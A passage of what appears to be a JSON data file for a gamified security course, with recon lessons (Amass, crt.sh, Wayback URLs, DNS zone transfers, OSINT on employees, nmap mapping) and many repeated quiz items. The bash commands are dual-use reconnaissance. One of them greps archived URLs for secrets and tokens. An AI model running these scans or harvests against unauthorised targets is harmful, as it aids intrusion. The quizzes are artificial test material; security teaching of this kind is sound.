Analysis","diff":2,"xp":150,"intro":"Every AWS API call is logged.","sections":[{"type":"text","content":"Detect unauthorized access, privesc, exfiltration. Watch for StopLogging."},{"type":"code","lang":"bash","content":"aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"StopLogging event indicates?","opts":["Normal operation","Attacker covering tracks","Backup","Maintenance"],"ans":1},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-incident-response","cat":"Cloud & Container","title":"Cloud Incident Response","diff":2,"xp":150,"intro":"Snapshot, isolate, investigate without touching the instance.","sections":[{"type":"text","content":"Snapshot volume, isolate via security group, create forensics instance, attach snapshot."},{"type":"code","lang":"bash","content":"aws ec2 create-snapshot --volume-id vol-xxx\naws ec2 modify-instance-attribute --instance-id i-xxx --groups sg-isolate"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"First step in cloud IR?","opts":["Delete instance","Snapshot the instance","Notify press","Restart service"],"ans":1},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"amass-subdomain","cat":"Reconnaissance","title":"Amass Subdomain Enumeration","diff":2,"xp":150,"intro":"OWASP Amass \u2014 the most comprehensive subdomain discovery tool.","sections":[{"type":"text","content":"Amass combines passive sources (cert transparency, DNS datasets, web archives) with active brute-forcing for thorough subdomain enumeration."},{"type":"code","lang":"bash","content":"amass enum -d example.com -o subs.txt\namass enum -passive -d example.com\namass enum -brute -d example.com -w subdomains-top1m.txt\namass viz -d3 -d example.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Amass combines which two approaches?","opts":["Scanning and exploitation","Passive OSINT and active brute-force","Social engineering and phishing","Port scanning and service detection"],"ans":1},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"cert-transparency","cat":"Reconnaissance","title":"Certificate Transparency Logs","diff":1,"xp":75,"intro":"Every SSL cert is logged \u2014 mine the logs for subdomains.","sections":[{"type":"text","content":"Certificate Transparency requires CAs to log every issued cert. Search these logs to find subdomains the target didn't publicize."},{"type":"code","lang":"bash","content":"# Using crt.sh\ncurl -s 'https://crt.sh/?q=%25.example.com&output=json' | jq '.[].name_value' | sort -u\n# Using certsh tool\npython3 certsh.py -d example.com\n# Censys.io also indexes certs\ncensys search 'parsed.subject.common_name:example.com'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Certificate Transparency logs are maintained by...","opts":["Certificate Authorities","Browser vendors","ICANN","The domain owner"],"ans":0},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"wayback-recon","cat":"Reconnaissance","title":"Wayback Machine Recon","diff":1,"xp":75,"intro":"Find old endpoints, API keys, and leaked files in archived pages.","sections":[{"type":"text","content":"The Wayback Machine archives old versions of websites. Deleted pages, old API endpoints, and accidentally exposed files are still there."},{"type":"code","lang":"bash","content":"# Find archived URLs\ncurl -s 'http://web.archive.org/cdx/search/cdx?url=example.com/*&output=text&fl=original&collapse=urlkey' | sort -u\n# Using waybackurls\nwaybackurls example.com | grep -E '.js$|.json$|api|admin|config'\n# Look for sensitive files\nwaybackurls example.com | grep -iE 'password|secret|key|token|backup'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"The Wayback Machine is useful for finding...","opts":["Current vulnerabilities","Deleted pages and old endpoints","Network topology","User credentials"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"dns-zone-transfer","cat":"Reconnaissance","title":"DNS Zone Transfer (AXFR)","diff":1,"xp":75,"intro":"A misconfigured DNS server gives you every record in the zone.","sections":[{"type":"text","content":"Zone transfers replicate all DNS records between servers. If a server allows AXFR from anyone, you get the complete subdomain list."},{"type":"code","lang":"bash","content":"# Attempt zone transfer\ndig axfr example.com @ns1.example.com\n# Or with host\nhost -t axfr example.com ns1.example.com\n# Find nameservers first\ndig ns example.com\n# Try each nameserver\nfor ns in $(dig ns example.com +short); do echo \"--- $ns ---\"; dig axfr example.com @$ns; done"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"AXFR is a...","opts":["DNS record type","Zone transfer request","Firewall rule","Encryption method"],"ans":1},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"social-engineering-recon","cat":"Reconnaissance","title":"Social Engineering Reconnaissance","diff":1,"xp":75,"intro":"OSINT on people \u2014 LinkedIn, social media, and public records.","sections":[{"type":"text","content":"Find employee names, email formats, technologies used, and org structure from LinkedIn, job postings, and social media."},{"type":"code","lang":"bash","content":"# Email format discovery\n# Check: hunter.io, email-format.com\n# LinkedIn employee enumeration\n# Technique: search 'site:linkedin.com/in \"company name\"'\n# Job postings reveal tech stack\n# 'We use Kubernetes, AWS, React...' = attack surface\n# theHarvester\ntheHarvester -d example.com -b all"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Job postings are useful for recon because they reveal...","opts":["Salaries","Technologies and tools the company uses","Office locations","Employee names"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"network-mapping","cat":"Reconnaissance","title":"Network Mapping & Topology","diff":1,"xp":100,"intro":"Build a picture of the target's network layout.","sections":[{"type":"text","content":"Map subnets, identify key servers, find network boundaries. traceroute reveals hops, nmap finds live hosts, and ARP shows local devices."},{"type":"code","lang":"bash","content":"# Discover live hosts\nnmap -sn 10.10.10.0/24\n# Trace route to target\ntraceroute 10.10.10.5\n# ARP scan (local network)\narp-scan --localnet\n# OS detection\nnmap -O 10.10.10.5\n# Visual map with Zenmap\nzenmap -sn 10.10.10.0/24"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"nmap -sn performs a...","opts":["Port scan","Ping sweep / host discovery","Service detection","Vulnerability scan"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google 